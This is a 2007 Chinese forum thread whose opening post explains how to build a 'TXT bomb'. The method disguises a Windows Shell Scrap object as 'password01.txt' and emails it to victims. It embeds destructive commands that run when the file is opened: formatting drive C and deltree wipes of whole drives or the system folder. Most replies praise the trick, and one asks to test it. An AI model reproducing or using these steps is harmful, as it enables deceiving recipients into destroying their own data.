标题:
[
技术文章
]
TXT炸弹的制作
[打印本页]
作者:
shillan
时间:
2007-1-22 21:09
标题:
TXT炸弹的制作
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击{写字板文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为"片段"),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.shs”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出dos运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)
很简单,这样一个恶意的攻击程序被弄出来了!
作者:
ywd175
时间:
2007-1-22 21:32
谢谢
作者:
ywd175
时间:
2007-1-22 21:35
这东西不错
作者:
ywd175
时间:
2007-1-22 21:41
哈哈,我也灌一下水!
作者:
flyly
时间:
2007-3-6 12:20
呵呵~~~~~
作者:
龙峰
时间:
2007-3-10 22:25
学会电脑不是做这个的!浪费了头脑了.
作者:
sterok
时间:
2007-6-4 17:41
巧用dos命令实现文件合并隐藏秘密
作者:
heye7890
时间:
2007-8-27 14:05
看帖要回帖,做人要厚道
作者:
jin888s
时间:
2007-11-28 12:36
不错的东西
作者:
海浪飞
时间:
2009-1-5 14:35
太有才了!
作者:
haijintian
时间:
2009-1-15 11:32
敢问您的邮箱是多少?我想先试一下效果
欢迎光临 逐梦论坛 (http://temp2023.zhumeng.org/)
Powered by Discuz! 7.2